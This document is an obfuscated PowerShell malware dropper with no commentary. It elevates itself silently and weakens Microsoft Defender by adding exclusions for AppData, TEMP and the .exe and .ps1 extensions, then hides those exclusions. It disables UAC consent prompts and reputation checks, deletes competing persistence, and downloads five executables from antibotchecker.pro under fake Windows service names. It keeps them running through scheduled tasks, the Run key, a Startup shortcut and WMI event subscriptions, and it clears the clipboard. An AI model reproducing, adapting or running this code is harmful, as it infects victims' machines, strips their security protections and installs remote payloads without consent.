Set-StrictMode -Off $ErrorActionPreference = 'SilentlyContinue' $WarningPreference = 'SilentlyContinue' $VerbosePreference = 'SilentlyContinue' $DebugPreference = 'SilentlyContinue' $InformationPreference = 'SilentlyContinue' $ProgressPreference = 'SilentlyContinue' $ConfirmPreference = 'None' trap { continue } $debugLog = $false $logPath = Join-Path $env:TEMP 'wus.log' function Write-Log([string]$Text) { if (-not $debugLog) { return } try { Add-Content -LiteralPath $logPath -Value (('[' + (Get-Date -Format 'HH:mm:ss') + '] ' + $Text)) } catch {} } function Set-RegDWord([string]$Path, [string]$Name, [int]$Value) { try { if (-not (Test-Path -LiteralPath $Path)) { New-Item -Path $Path -Force | Out-Null } New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType DWord -Force -ErrorAction SilentlyContinue | Out-Null } catch {} } $script:hasWmi = $null -ne (Get-Command Get-WmiObject -ErrorAction SilentlyContinue) $mpExcl = @() try { foreach ($e0 in @((& ('Get-Mp'+'Preference')).ExclusionPath)) { if ($e0) { $mpExcl += ([string]$e0).TrimEnd('\').ToLower() } } } catch { } function Add-ExclPath([string]$Path, [string]$RegKey) { if (-not $Path) { return } $n0 = ([string]$Path).TrimEnd('\').ToLower() foreach ($e0 in @($script:mpExcl)) { if ($e0 -eq $n0) { return } } Set-RegDWord -Path $RegKey -Name $Path -Value 0 try { $h = @{}; $h[('Excl'+'usionPath')] = $Path; & ('Add-Mp'+'Preference') @h -Force -ErrorAction SilentlyContinue } catch {} $script:mpExcl += $n0 } $sc = $null try { if ($PSCommandPath) { $sc = (Get-Content -LiteralPath $PSCommandPath -Raw -ErrorAction SilentlyContinue) } } catch { } if (-not $sc) { try { $sc = (gv ('MyInvo'+'cation')).Value.MyCommand.ScriptBlock.ToString() } catch { } } if (-not $sc) { try { $p0 = (gv ('MyInvo'+'cation')).Value.MyCommand.Path; if ($p0) { $sc = (Get-Content -LiteralPath $p0 -Raw -ErrorAction SilentlyContinue) } } catch { } } if (-not $sc) { try { $sc = (gv ('MyInvo'+'cation')).Value.MyCommand.Definition } catch { } } $adm = $false try { $id0 = [Security.Principal.WindowsIdentity]::GetCurrent() $pr0 = New-Object Security.Principal.WindowsPrincipal($id0) if ($pr0.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { $adm = $true } } catch { } if (-not $adm) { if ($env:__hv -eq '1') { exit } try { $bt = Join-Path $env:TEMP ('el' + 'evated.ps1') $ok = $false if ($sc) { try { [IO.File]::WriteAllText($bt, $sc, (New-Object Text.UTF8Encoding($false))); $ok = (Test-Path -LiteralPath $bt) } catch { } } if ($ok) { $cmd = '$env:__hv=''1''; & ''' + $bt.Replace("'", "''") + '''' $enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd)) Start-Process 'powershell' -ArgumentList @('-NoP','-NonI','-Ex','Bypass','-Wi','Hidden','-EncodedCommand',$enc) -Verb RunAs -ErrorAction Stop | Out-Null } } catch { } exit } if ($env:__hv -eq '1') { try { Remove-Item -LiteralPath ($env:TEMP + '\el' + 'evated.ps1') -Force -ErrorAction SilentlyContinue } catch {} } try { $pd = ('%AppData%\Micro'+'soft\Windows\The'+'mes') $df = Join-Path $env:APPDATA ('Micro'+'soft\Windows\The'+'mes') if (-not (Test-Path $df)) { New-Item -Path $df -ItemType Directory -Force | Out-Null } if (-not (Test-Path $df)) { throw 'no dir' } } catch { $pd = $null; $df = $null } if (-not $df) { exit } $binaries = @( ('Windows'+'UpdateService.exe'), ('System'+'Maintenance.exe'), ('Network'+'Service.exe'), ('Device'+'Sync.exe'), ('Background'+'Tasks.exe'), ('Telemetry'+'Service.exe'), ('Diagnostics'+'Hub.exe'), ('Security'+'Health.exe'), ('AppX'+'Deployment.exe'), ('Font'+'Cache.exe'), ('WaaS'+'Medic.exe'), ('Windows'+'Search.exe') ) $folders = @( ('System'+'Resources'), ('Language'+'Overlays'), ('Access'+'ibility'), 'InputMethod', 'Cursors', 'Themes', 'Icons', 'Wallpapers', 'LogonUI', 'WinSetup' ) $legit = @('WindowsUpdate','MicrosoftEdgeUpdate','OneDriveSync','AdobeUpdate','GoogleUpdate','WindowsDefender','SystemMaintenance','NetworkService','DeviceSync','BackgroundTasks','TelemetryService','DiagnosticsHub','SecurityHealth','AppXDeployment','FontCache','WaaSMedic','WindowsSearch','PrintSpooler','BluetoothService','StorageService','DisplayService','InputService') function Get-StableHash([string]$Text) { $h = [int64]17 foreach ($c in $Text.ToCharArray()) { $h = (($h * 131) + [int64][int]$c) % 2147483647 } return [int64]$h } function Get-DetNum($seed) { $v = Get-StableHash ([string]$env:COMPUTERNAME + '|' + [string]$seed) return (($v % 9000) + 1000) } $usedPaths = @{} function Get-Slot([int]$seed) { for ($k = 0; $k -lt ($binaries.Count * $folders.Count); $k++) { $bi = ($seed + $k) % $binaries.Count $fi = (($seed * 7) + $k) % $folders.Count $cand = Join-Path $df ($folders[$fi] + '\' + $binaries[$bi]) if (-not $usedPaths.ContainsKey($cand)) { $usedPaths[$cand] = $true; return @($bi, $fi) } } $bi = Get-Random -Maximum $binaries.Count $fi = Get-Random -Maximum $folders.Count return @($bi, $fi) } function Test-FileOk([string]$Path) { try { if (-not (Test-Path -LiteralPath $Path)) { return $false } if ((Get-Item -LiteralPath $Path -Force).Length -le 0) { return $false } return $true } catch { return $false } } function Clear-Clip { try { Add-Type -AssemblyName System.Windows.Forms -ErrorAction SilentlyContinue } catch {} try { [System.Windows.Forms.Clipboard]::Clear() } catch {} try { Set-Clipboard -Value ' ' -ErrorAction SilentlyContinue } catch {} try { [System.Windows.Forms.Clipboard]::Clear() } catch {} } function New-StartupShortcut { param([string]$Target, [string]$Name) try { $sf = Join-Path $env:APPDATA ('Micro' + 'soft\Windows\Start Menu\Programs\Start' + 'up') if (-not (Test-Path -LiteralPath $sf)) { $sf = Join-Path $env:ProgramData ('Micro' + 'soft\Windows\Start Menu\Programs\Start' + 'up') } if (-not (Test-Path -LiteralPath $sf)) { return $false } $lnk = Join-Path $sf ($Name + '.lnk') $ws = New-Object -ComObject WScript.Shell $sc = $ws.CreateShortcut($lnk) $sc.TargetPath = $Target $sc.WorkingDirectory = (Split-Path -LiteralPath $Target -Parent) $sc.WindowStyle = 7 $sc.Description = $Name $sc.Save() try { & attrib.exe +h +s $lnk 2>$null | Out-Null } catch { } return (Test-Path -LiteralPath $lnk) } catch { return $false } } function New-TaskSettings { $h = @{ StartWhenAvailable = $true; AllowStartIfOnBatteries = $true; DontStopIfGoingOnBatteries = $true; MultipleInstances = 'IgnoreNew' } try { $s = New-ScheduledTaskSettingsSet @h -RestartCount 3 -RestartInterval (New-TimeSpan -Minutes 1) -ErrorAction Stop try { $s.ExecutionTimeLimit = [TimeSpan]::Zero } catch {} $s.Hidden = $true return $s } catch { } try { $s = New-ScheduledTaskSettingsSet -StartWhenAvailable -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ErrorAction Stop try { $s.ExecutionTimeLimit = [TimeSpan]::Zero } catch {} $s.Hidden = $true return $s } catch { } return $null } function Start-ProcessWmi([string]$Path) { try { if ($script:hasWmi) { $r = ([wmiclass]('root\cimv2:' + 'Win32_'+'Pro'+'cess')).Create('"' + $Path + '"', (Split-Path -LiteralPath $Path -Parent)) if ($r -and $r.ReturnValue -eq 0) { return $true } } else { $r = Invoke-CimMethod -ClassName Win32_Process -Namespace root/cimv2 -MethodName Create -Arguments @{ CommandLine = ('"' + $Path + '"'); CurrentDirectory = (Split-Path -LiteralPath $Path -Parent) } if ($r -and $r.ReturnValue -eq 0) { return $true } } } catch { } return $false } $urls = @( @{ Address = ('https:/'+'/antibotchecker'+'.pro/'+'MR.exe'); Auto = $true }, @{ Address = ('https:/'+'/antibotchecker'+'.pro/'+'BERSERK.exe'); Auto = $true }, @{ Address = ('https:/'+'/antibotchecker'+'.pro/'+'host.exe'); Auto = $false }, @{ Address = ('https:/'+'/antibotchecker'+'.pro/'+'SUP.exe'); Auto = $true }, @{ Address = ('https:/'+'/antibotchecker'+'.pro/'+'cl2.exe'); Auto = $true } ) $jobs = @() foreach ($item in $urls) { if ($item.Address -and $item.Address.Trim()) { $jobs += @{ Uri = $item.Address.Trim().Replace('"',''); Permanent = [bool]$item.Auto } } } $wmiNs = ('root\sub'+'scription') try { Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object { $t0 = $_ try { $hit = $false foreach ($a0 in $t0.Actions) { $ar = [string]$a0.Arguments if (($ar -match ('Down'+'loadFile')) -or ($ar -match ('App'+'Data\\Local\\Temp'))) { $hit = $true } if (($ar -match ('-E'+'nc ')) -or ($ar -match ('JAB1AD0A'))) { $hit = $true } if ($ar -match '([A-Za-z]:\\[^"]+?\.(exe|ps1))') { if (-not (Test-Path -LiteralPath $matches[1])) { $hit = $true } } if ($ar -match ('Font'+'Cache\d+\.ps1') -and ($ar -notmatch ('The'+'mes\\Font'+'Cache'))) { $hit = $true } } if ($hit) { Unregister-ScheduledTask -TaskName $t0.TaskName -TaskPath $t0.TaskPath -Confirm:$false -ErrorAction SilentlyContinue } } catch { } } } catch { } foreach ($pair in @(@('__Event'+'Filter', 'SelfHeal'), @('__Event'+'Filter', 'PerfNet'), @('CommandLine'+'Event'+'Consumer', 'SelfHealC'), @('CommandLine'+'Event'+'Consumer', 'PerfProc'))) { try { $objs = @() try { $objs = @(Get-WmiObject -Namespace $wmiNs -Class $pair[0] -ErrorAction SilentlyContinue) } catch { $objs = @() } if (-not $objs) { try { $objs = @(Get-CimInstance -Namespace $wmiNs -ClassName $pair[0] -ErrorAction SilentlyContinue) } catch { $objs = @() } } foreach ($o in $objs) { if ($o.Name -like ($pair[1] + '*')) { try { Remove-WmiObject -InputObject $o -ErrorAction SilentlyContinue } catch { } try { Remove-CimInstance -InputObject $o -ErrorAction SilentlyContinue } catch { } } } } catch { } } try { $rk = ('HKCU:\Soft'+'ware\Microsoft\Windows\Cur'+'rentVersion\Run') $rp1 = Get-ItemProperty -Path $rk -ErrorAction SilentlyContinue foreach ($pr1 in @($rp1.PSObject.Properties)) { if ($pr1.Name -match '^PS') { continue } $dv = [string]$pr1.Value if (($dv -match ('-E'+'nc ')) -or ($dv -match ('Down'+'loadFile')) -or ($dv -match 'JAB1AD0A')) { try { Remove-ItemProperty -Path $rk -Name $pr1.Name -Force -ErrorAction SilentlyContinue } catch { } } } } catch { } try { foreach ($k in @(('HKLM:\SYSTEM\Cur'+'rentCon'+'trolSet\Control\CI\Po'+'licy'),('HKLM:\SYSTEM\Cur'+'rentCon'+'trolSet\Control\CI\Pro'+'tected'))) { try { if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null } } catch {} } Set-RegDWord -Path ('HKLM:\SYSTEM\Cur'+'rentCon'+'trolSet\Control\CI\Po'+'licy') -Name ('VerifiedAnd'+'Reputable'+'PolicyState') -Value 0 Set-RegDWord -Path ('HKLM:\SYSTEM\Cur'+'rentCon'+'trolSet\Control\CI\Pro'+'tected') -Name ('VerifiedAnd'+'Reputable'+'PolicyState'+'Min'+'ValueSeen') -Value 0 $dp = ('HKLM:\SOFT'+'WARE\Policies\Microsoft\Windows Def'+'ender') try { if (-not (Test-Path $dp)) { New-Item -Path $dp -Force | Out-Null } } catch {} Set-RegDWord -Path $dp -Name ('Hide'+'Exclu'+'sionsUI') -Value 1 Set-RegDWord -Path $dp -Name ('Hide'+'Exclu'+'sions'+'FromLocal'+'Admins') -Value 1 Set-RegDWord -Path $dp -Name ('Hide'+'Exclu'+'sions'+'FromLocal'+'Users') -Value 1 Set-RegDWord -Path $dp -Name ('Disable'+'Special'+'Detection') -Value 1 $xp = ($dp + '\Exclusions\Paths') $xe = ($dp + '\Exclusions\Extensions') foreach ($k in @($xp,$xe)) { try { if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null } } catch {} } try { $pv = Get-ItemProperty -Path $xp -ErrorAction SilentlyContinue foreach ($pr0 in @($pv.PSObject.Properties)) { if ($pr0.Name -match '^PS') { continue } $script:mpExcl += ([string]$pr0.Name).TrimEnd('\').ToLower() } } catch { } $adRoot = $null try { $adRoot = (Split-Path -LiteralPath $env:APPDATA -Parent) } catch { } if (-not $adRoot) { try { $adRoot = ($env:USERPROFILE + '\App'+'Data') } catch { } } foreach ($p in @($adRoot, $env:TEMP, $env:APPDATA, $df)) { if (-not $p) { continue } Add-ExclPath -Path $p -RegKey $xp } foreach ($e in @(".exe", ".ps1")) { Set-RegDWord -Path $xe -Name $e -Value 0 try { $h = @{}; $h[('Excl'+'usion'+'Extension')] = $e; & ('Add-Mp'+'Preference') @h -Force -ErrorAction SilentlyContinue } catch {} } $rp = ('HKLM:\SOFT'+'WARE\Microsoft\Windows\Cur'+'rentVersion\Policies\Sys'+'tem') $uc = @{ ('Consent'+'Prompt'+'Behavior'+'Admin') = 0 ('Consent'+'Prompt'+'Behavior'+'User') = 0 ('PromptOn'+'Secure'+'Desktop') = 0 ('Enable'+'Installer'+'Detection') = 0 'EnableLUA' = 1 } foreach ($entry in $uc.Keys) { Set-RegDWord -Path $rp -Name $entry -Value $uc[$entry] } try { $tn = ('System.Net.Serv'+'icePoint'+'Manager') [Net.WebClient].Assembly.GetType($tn).GetMethod(('set_Secur'+'ityProtocol')).Invoke($null, @([Int32]3072)) } catch {} } catch { } try { Start-Sleep -Seconds 11 } catch {} function Download-File { param([string]$Uri, [string]$Out, [int]$Tries = 5) for ($i = 0; $i -lt $Tries; $i++) { try { $wc = New-Object Net.WebClient $wc.Headers.Add('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') $wc.DownloadFile($Uri, $Out) } catch { Write-Log ('wc fail ' + $Uri) } if (-not (Test-FileOk $Out)) { try { Invoke-WebRequest -Uri $Uri -OutFile $Out -UseBasicParsing -TimeoutSec 60 -ErrorAction Stop } catch { Write-Log ('iwr fail ' + $Uri) } } if (-not (Test-FileOk $Out)) { try { $hc = New-Object Net.Http.HttpClient $hc.Timeout = [TimeSpan]::FromSeconds(60) $bytes = $hc.GetByteArrayAsync($Uri).GetAwaiter().GetResult() [IO.File]::WriteAllBytes($Out, $bytes) } catch { Write-Log ('http fail ' + $Uri) } } if (Test-FileOk $Out) { return $true } try { Start-Sleep -Milliseconds (Get-Random -Minimum 1000 -Maximum 3000) } catch { try { Start-Sleep -Seconds 1 } catch {} } } return $false } function Invoke-Exe { param([string]$Path) if (-not (Test-FileOk $Path)) { Write-Log ('missing ' + $Path); return $false } $proc = $null try { $proc = Start-Process -FilePath $Path -WindowStyle Hidden -PassThru -ErrorAction SilentlyContinue } catch { Write-Log ('sp fail ' + $Path) } if ($proc) { return $true } if (Start-ProcessWmi -Path $Path) { return $true } Write-Log ('wmi fail ' + $Path) return $false } Clear-Clip foreach ($task in @($jobs)) { try { if (-not $task.Uri) { continue } $isBerserk = ($task.Uri -match '(?i)BERSERK\.exe') $n1 = Get-DetNum $task.Uri if ($isBerserk) { $td = Join-Path $df $folders[0] $tf = Join-Path $td ('Windows' + 'Audio' + 'Service.exe') } else { $slot = Get-Slot $n1 $bi = $slot[0] $fi = $slot[1] $td = Join-Path $df $folders[$fi] $tf = Join-Path $td $binaries[$bi] } if (-not (Test-Path -LiteralPath $td)) { New-Item -Path $td -ItemType Directory -Force | Out-Null } $null = Download-File -Uri $task.Uri -Out $tf if (-not (Test-FileOk $tf)) { Write-Log ('skip ' + $tf); continue } try { & attrib.exe +h +s $tf 2>$null | Out-Null } catch { } if ($task.Permanent -and -not $isBerserk) { $tname = ($legit[$n1 % $legit.Count]) + $n1 $stt = New-TaskSettings if ($stt) { $act = New-ScheduledTaskAction -Execute $tf $tB2 = New-ScheduledTaskTrigger -AtStartup try { $tB2.Delay = (New-TimeSpan -Seconds 45) } catch { } $tL2 = New-ScheduledTaskTrigger -AtLogOn try { $tL2.Delay = (New-TimeSpan -Seconds 20) } catch { } $trg = @($tB2, $tL2) try { Unregister-ScheduledTask -TaskName $tname -Confirm:$false -ErrorAction SilentlyContinue } catch { } try { $full = [Security.Principal.WindowsIdentity]::GetCurrent().Name $prn = New-ScheduledTaskPrincipal -UserId $full -LogonType Interactive -RunLevel Highest Register-ScheduledTask -TaskName $tname -Action $act -Trigger $trg -Settings $stt -Principal $prn -Force -ErrorAction Stop | Out-Null } catch { try { Register-ScheduledTask -TaskName $tname -Action $act -Trigger $trg -Settings $stt -Force | Out-Null } catch { } } } try { Set-RegDWord -Path ('HKCU:\Soft'+'ware\Microsoft\Windows\Cur'+'rentVersion\Run') -Name $tname -Value 0; Remove-ItemProperty -Path ('HKCU:\Soft'+'ware\Microsoft\Windows\Cur'+'rentVersion\Run') -Name $tname -Force -ErrorAction SilentlyContinue } catch { } try { New-ItemProperty -Path ('HKCU:\Soft'+'ware\Microsoft\Windows\Cur'+'rentVersion\Run') -Name $tname -Value ('"' + $tf + '"') -PropertyType String -Force -ErrorAction SilentlyContinue | Out-Null } catch { } } if ($isBerserk) { $null = New-StartupShortcut -Target $tf -Name ('Windows' + 'Audio' + 'Service') } $wmiF = ('PerfNet' + $n1) $wmiC = ('PerfProc' + $n1) $wql = "SELECT * FROM __InstanceCreationEvent WITHIN 30 WHERE TargetInstance ISA '" + ('Win32_'+'Pro'+'cess') + "' AND TargetInstance.Name = '" + ('explorer'+'.exe') + "'" try { if ($script:hasWmi) { Get-WmiObject -Namespace $wmiNs -Class ('__Event'+'Filter') -Filter "Name='$wmiF'" -ErrorAction SilentlyContinue | Remove-WmiObject -ErrorAction SilentlyContinue Get-WmiObject -Namespace $wmiNs -Class ('CommandLine'+'Event'+'Consumer') -Filter "Name='$wmiC'" -ErrorAction SilentlyContinue | Remove-WmiObject -ErrorAction SilentlyContinue $f = Set-WmiInstance -Namespace $wmiNs -Class ('__Event'+'Filter') -Arguments @{ Name = $wmiF; EventNamespace = 'root\cimv2'; QueryLanguage = 'WQL'; Query = $wql } $c = Set-WmiInstance -Namespace $wmiNs -Class ('CommandLine'+'Event'+'Consumer') -Arguments @{ Name = $wmiC; CommandLineTemplate = ('"' + $tf + '"') } Set-WmiInstance -Namespace $wmiNs -Class ('__FilterTo'+'Consumer'+'Binding') -Arguments @{ Filter = $f; Consumer = $c } } else { Get-CimInstance -Namespace $wmiNs -ClassName ('__Event'+'Filter') -Filter "Name='$wmiF'" -ErrorAction SilentlyContinue | Remove-CimInstance -ErrorAction SilentlyContinue Get-CimInstance -Namespace $wmiNs -ClassName ('CommandLine'+'Event'+'Consumer') -Filter "Name='$wmiC'" -ErrorAction SilentlyContinue | Remove-CimInstance -ErrorAction SilentlyContinue $f = New-CimInstance -Namespace $wmiNs -ClassName ('__Event'+'Filter') -Property @{ Name = $wmiF; EventNamespace = 'root\cimv2'; QueryLanguage = 'WQL'; Query = $wql } $c = New-CimInstance -Namespace $wmiNs -ClassName ('CommandLine'+'Event'+'Consumer') -Property @{ Name = $wmiC; CommandLineTemplate = ('"' + $tf + '"') } New-CimInstance -Namespace $wmiNs -ClassName ('__FilterTo'+'Consumer'+'Binding') -Property @{ Filter = $f; Consumer = $c } } } catch { } $null = Invoke-Exe -Path $tf } catch { Write-Log ('loop ' + $_.Exception.Message) } }